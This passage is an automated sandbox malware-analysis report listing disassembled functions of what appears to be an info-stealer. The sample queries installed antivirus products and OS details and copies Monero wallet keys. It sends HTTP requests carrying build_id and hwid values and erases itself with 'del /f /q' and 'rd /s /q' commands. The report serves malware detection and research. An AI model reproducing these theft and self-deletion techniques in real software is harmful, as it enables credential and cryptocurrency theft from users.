                                                                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004040FC
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00404107
                                                                                    • InternetCloseHandle.WININET(?), ref: 0040411C
                                                                                    • InternetCloseHandle.WININET(?), ref: 00404125
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internet$lstrcpy$H_prologlstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                    • String ID: !$"$"$------$------$------$build_id$hwid
                                                                                    • API String ID: 1139859944-3346224549
                                                                                    • Opcode ID: 6763fc035234d5979cabe930e44d953dfd0e215cef660ea1f11e82d7fcc9c962
                                                                                    • Instruction ID: b0e5e0d41a604fbf99728ef0725b538a38cb0714067dfec9b32dda745c4f151e
                                                                                    • Opcode Fuzzy Hash: 6763fc035234d5979cabe930e44d953dfd0e215cef660ea1f11e82d7fcc9c962
                                                                                    • Instruction Fuzzy Hash: 31223AB190414CEADB11EBE4C956BEEBBB8AF18308F5041BEE50573582DB781B4CCB65

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040673C
                                                                                      • Part of subcall function 0040FB28: StrCmpCA.SHLWAPI(?,?,?,00408A88,00425D7C,00000000), ref: 0040FB31
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425B78,?,?,?,00425B4E,?,00000000), ref: 004068A8
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00411056: _EH_prolog.MSVCRT ref: 0041105B
                                                                                      • Part of subcall function 00411056: memset.MSVCRT ref: 0041107D
                                                                                      • Part of subcall function 00411056: OpenProcess.KERNEL32(00001001,00000000,?,?,?,?,00000000,?), ref: 00411104
                                                                                      • Part of subcall function 00411056: TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000000,?), ref: 00411112
                                                                                      • Part of subcall function 00411056: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 00411119
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00406A9A
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00406AA1
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00406BBF
                                                                                    • lstrcat.KERNEL32(00000000,00425B94), ref: 00406BCD
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00406BDF
                                                                                    • lstrcat.KERNEL32(00000000,00425B98), ref: 00406BED
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00406D34
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00406D42
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                    • memset.MSVCRT ref: 00406D9A
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 00406DBF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrcat$lstrcpy$Processlstrlen$FileHeapmemset$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 4187064601-0
                                                                                    • Opcode ID: 8e1653efa4f5854faced7d70c72396407c3d3c249bef8c47c695785d4c6cb76f
                                                                                    • Instruction ID: ba7657a0882041a922700d4e4b68e078784f46e31e746cb862f522f044a4a9e6
                                                                                    • Opcode Fuzzy Hash: 8e1653efa4f5854faced7d70c72396407c3d3c249bef8c47c695785d4c6cb76f
                                                                                    • Instruction Fuzzy Hash: 9F224771904248EEDF15EBE4DD56AEEBB75AF18308F50407EF402721D2DB782A09DB26
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040875E
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00425D70,?,?,?,00425B92,00000000), ref: 00408841
                                                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004089AE
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 004089B5
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00408AD8
                                                                                    • lstrcat.KERNEL32(00000000,00425D84), ref: 00408AE6
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00408AF8
                                                                                    • lstrcat.KERNEL32(00000000,00425D88), ref: 00408B06
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00408C19
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00408C27
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                    • memset.MSVCRT ref: 00408C7F
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 00408CA4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyCreateDeleteObjectProcessSingleSystemThreadTimeWaitmemset
                                                                                    • String ID:
                                                                                    • API String ID: 156379684-0
                                                                                    • Opcode ID: 43e7eccc74614d8f611f5c667144751c4e0face382e07e427c529d3e51f79cf1
                                                                                    • Instruction ID: 995570c1c0ce675a9085062181732195259fe43f91e974d6a0640a795ee953cc
                                                                                    • Opcode Fuzzy Hash: 43e7eccc74614d8f611f5c667144751c4e0face382e07e427c529d3e51f79cf1
                                                                                    • Instruction Fuzzy Hash: 3AF15771804158EADB15EBE4DD1ABEEBB74AF18308F10807EE505721E2DF782A09DB25
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00410781
                                                                                    • CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,?,?,?,?,?,?,004265CC,00000000,?,Work Dir: In memory,00000000), ref: 00410799
                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000), ref: 004107AA
                                                                                    • CoCreateInstance.OLE32(00426F54,00000000,00000001,00426E84,?,?,00000000,?,?,?,?,?,?,004265CC,00000000,?), ref: 004107C4
                                                                                    • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000), ref: 004107FA
                                                                                    • VariantInit.OLEAUT32(?), ref: 00410855
                                                                                      • Part of subcall function 004106C4: _EH_prolog.MSVCRT ref: 004106C9
                                                                                      • Part of subcall function 004106C4: CoCreateInstance.OLE32(00426D04,00000000,00000001,00426430,?,00000001,00000000,00000000,00000001,?,00000000), ref: 004106F0
                                                                                      • Part of subcall function 004106C4: SysAllocString.OLEAUT32(?), ref: 004106FD
                                                                                      • Part of subcall function 004106C4: _wtoi64.MSVCRT ref: 00410738
                                                                                      • Part of subcall function 004106C4: SysFreeString.OLEAUT32(?), ref: 0041074B
                                                                                      • Part of subcall function 004106C4: SysFreeString.OLEAUT32(00000000), ref: 00410752
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,004265CC,00000000,?,Work Dir: In memory,00000000), ref: 0041088D
                                                                                    • GetProcessHeap.KERNEL32(?,?,00000000,?,?,?,?,?,?,004265CC,00000000,?,Work Dir: In memory,00000000,?,004265B4), ref: 00410893
                                                                                    • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,00000000,?,?,?,?,?,?,004265CC,00000000,?,Work Dir: In memory), ref: 004108A0
                                                                                    • VariantClear.OLEAUT32(?), ref: 004108E2
                                                                                    • wsprintfA.USER32 ref: 004108CC
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: String$AllocCreateFreeH_prologHeapInitializeInstanceTimeVariant$BlanketClearFileInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                    • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                    • API String ID: 2456697202-461178377
                                                                                    • Opcode ID: 4c5c30e2ea9d2adf16a85c0074a720322db174524018e3eb54dc317dc257ee69
                                                                                    • Instruction ID: 4b36eb2a1d5a1bedc29b67d6ed82d78b3e43d11d07795a3f045295924e426f07
                                                                                    • Opcode Fuzzy Hash: 4c5c30e2ea9d2adf16a85c0074a720322db174524018e3eb54dc317dc257ee69
                                                                                    • Instruction Fuzzy Hash: 63516C71A01228BBCB20DB95DC49EEFBB7CEF49B10F504116F515E6190C7B89A41CBA8
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004118B3
                                                                                    • strtok_s.MSVCRT ref: 004118E4
                                                                                    • StrCmpCA.SHLWAPI(?,true,?,?,00000104,?,00000104,?,?,00000000), ref: 0041197C
                                                                                      • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,0042655F,0042655E,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                                      • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                                    • lstrcpy.KERNEL32(?,?), ref: 00411A33
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00411A6F
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00411AB6
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00411AFD
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00411B44
                                                                                    • strtok_s.MSVCRT ref: 00411CA7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$strtok_s$H_prologlstrlen
                                                                                    • String ID: false$true
                                                                                    • API String ID: 49562497-2658103896
                                                                                    • Opcode ID: 59e9e0ed7abd9e5132589874edf6417603bdd11e833da19a679df8b697dbdabf
                                                                                    • Instruction ID: ba927b6fbe385cdc95ceeb1740fcb97b1cf008379e2e115a61cc2516e6170599
                                                                                    • Opcode Fuzzy Hash: 59e9e0ed7abd9e5132589874edf6417603bdd11e833da19a679df8b697dbdabf
                                                                                    • Instruction Fuzzy Hash: B6C182B190021DAFDF10EFE4D855EDE77B9AF18304F10446AF505A3191DF78AA89CB64
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00404F2F
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                      • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                      • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
                                                                                    • StrCmpCA.SHLWAPI(?), ref: 00404FA6
                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
                                                                                    • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
                                                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C
                                                                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004050D2
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 004050DD
                                                                                    • InternetCloseHandle.WININET(?), ref: 004050E6
                                                                                    • InternetCloseHandle.WININET(?), ref: 004050EF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internet$CloseHandleHttp$H_prologOpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                                    • String ID: ERROR$ERROR$GET
                                                                                    • API String ID: 2435781452-2509457195
                                                                                    • Opcode ID: 517f34d15c50c2bff24b9ad49d7a6df4359f1629075331d26f3e055988320fb2
                                                                                    • Instruction ID: c1fd0c265216fd47394e40449a31f27cb744319a2eff906596a5c238740c7f68
                                                                                    • Opcode Fuzzy Hash: 517f34d15c50c2bff24b9ad49d7a6df4359f1629075331d26f3e055988320fb2
                                                                                    • Instruction Fuzzy Hash: 93512F71900119AFEB11EBE0DC85FEFBBB9EB09744F10403AF605B2191DB795A48CBA5
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004041B7
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                      • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                      • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004041FE
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00404205
                                                                                    • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404224
                                                                                    • StrCmpCA.SHLWAPI(?), ref: 00404238
                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040425C
                                                                                    • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404292
                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004042B6
                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004042C1
                                                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 004042DF
                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00404337
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00404369
                                                                                    • InternetCloseHandle.WININET(?), ref: 00404372
                                                                                    • InternetCloseHandle.WININET(?), ref: 0040437B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internet$CloseHandleHttp$H_prologHeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                    • String ID: GET
                                                                                    • API String ID: 1687531150-1805413626
                                                                                    • Opcode ID: 5c17fe2671a6e7da2559d3110b2e5ff5de3778f8e7e7f5b7b1cd9291ace094b3
                                                                                    • Instruction ID: 7ce3078965428967d931fab95435fba2e2eaf60a30af71eeb75a30b69647e977
                                                                                    • Opcode Fuzzy Hash: 5c17fe2671a6e7da2559d3110b2e5ff5de3778f8e7e7f5b7b1cd9291ace094b3
                                                                                    • Instruction Fuzzy Hash: 07516DB2900219AFDB10EFE0CC85AEEBBB9EB49344F00513AFA01B2190D7785E45CB65
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004136E8
                                                                                    • memset.MSVCRT ref: 00413708
                                                                                    • memset.MSVCRT ref: 00413714
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000000), ref: 00413729
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 004138B5
                                                                                    • memset.MSVCRT ref: 004138C2
                                                                                    • memset.MSVCRT ref: 004138D0
                                                                                    • ExitProcess.KERNEL32 ref: 004138E1
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpymemset$H_prolog$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                                    • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$<$pr
                                                                                    • API String ID: 1312519015-1846221802
                                                                                    • Opcode ID: b60e4181e6a310db5da8c1337dc0a9af3d85a3d6be454d84c97edfaf10444dd9
                                                                                    • Instruction ID: f7fb810ff7d1253c450dda7b52a61bb1d28e29dbb724758fa3153a55c7d62ffe
                                                                                    • Opcode Fuzzy Hash: b60e4181e6a310db5da8c1337dc0a9af3d85a3d6be454d84c97edfaf10444dd9
                                                                                    • Instruction Fuzzy Hash: 24513EB1D0424DEEDB11EBE5C992ADEBBB8AF18304F50017EE105B3582DB785B48CB65
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0041092A
                                                                                    • CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000,?,004265B4,00000000,?,00000000), ref: 00410942
                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000), ref: 00410953
                                                                                    • CoCreateInstance.OLE32(00426F54,00000000,00000001,00426E84,?,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000,?,004265B4,00000000,?), ref: 0041096D
                                                                                    • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000,?), ref: 004109A3
                                                                                    • VariantInit.OLEAUT32(?), ref: 004109F6
                                                                                      • Part of subcall function 00410C8D: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,00410A1D,?,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000,?,004265B4,00000000), ref: 00410C95
                                                                                      • Part of subcall function 00410C8D: CharToOemW.USER32(?,00000000), ref: 00410CA1
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • VariantClear.OLEAUT32(?), ref: 00410A2B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prologInitInstanceLocalProxySecuritylstrcpy
                                                                                    • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                    • API String ID: 3694693100-315474579
                                                                                    • Opcode ID: 37c255ede78dc96a955b53c0c79ddd89c62703064e8d35959ae560dff953bc09
                                                                                    • Instruction ID: 31939d6998afadb2a5dbf95c0d2b4f071c2bc660873cc242f14b71194dd59c4b
                                                                                    • Opcode Fuzzy Hash: 37c255ede78dc96a955b53c0c79ddd89c62703064e8d35959ae560dff953bc09
                                                                                    • Instruction Fuzzy Hash: 5B418E70A01229BBCB20DB95DD49EEF7F78EF49B60F60411AF115A6180C7B85A41CBA8
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00401C70
                                                                                    • memset.MSVCRT ref: 00401C8E
                                                                                      • Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
                                                                                      • Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
                                                                                      • Part of subcall function 00401000: RegOpenKeyExA.KERNEL32(000000FF,00000000,00000000,00020119,?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
                                                                                      • Part of subcall function 00401000: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 00401CB2
                                                                                    • lstrlenA.KERNEL32(?,?,?,?,?,?,?), ref: 00401CBF
                                                                                    • lstrcat.KERNEL32(?,.keys), ref: 00401CDA
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                    • CopyFileA.KERNEL32(?,00000000,00000001,00000000,?,00000000,?,00422360,?,?,?,0042234B,00000000,?,\Monero\wallet.keys,?), ref: 00401E04
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                      • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                      • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                      • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                      • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
